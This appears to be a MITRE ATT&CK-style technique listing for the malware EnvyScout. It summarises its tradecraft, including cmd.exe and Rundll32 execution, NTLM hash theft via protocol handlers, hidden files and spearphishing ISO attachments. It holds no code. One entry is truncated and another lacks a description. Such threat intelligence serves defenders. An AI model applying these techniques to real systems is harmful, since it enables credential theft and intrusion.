|Enterprise||T1059||.003||Command and Scripting Interpreter: Windows Command Shell||
EnvyScout can use cmd.exe to execute malicious files on compromised hosts.
|Enterprise||T1005||Data from Local System||
EnvyScout can collect sensitive NTLM material from a compromised host.
|Enterprise||T1140||Deobfuscate/Decode Files or Information||
EnvyScout can deobfuscate and write malicious ISO files to disk.
EnvyScout can call
EnvyScout can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure.
|Enterprise||T1564||.001||Hide Artifacts: Hidden Files and Directories||
EnvyScout can use hidden directories and files to hide malicious executables.
EnvyScout has used folder icons for malicious files to lure victims into opening them.
|Enterprise||T1027||Obfuscated Files or Information|
|Enterprise||T1566||.001||Phishing: Spearphishing Attachment||
EnvyScout has been distributed via spearphishing as an email attachment.
|Enterprise||T1218||.011||System Binary Proxy Execution: Rundll32||
EnvyScout has the ability to proxy execution of malicious files with Rundll32.
|Enterprise||T1082||System Information Discovery||
EnvyScout can determine whether the ISO payload was received by a Windows or iOS device.
|Enterprise||T1204||.002||User Execution: Malicious File||
EnvyScout has been executed through malicious files attached to e-mails.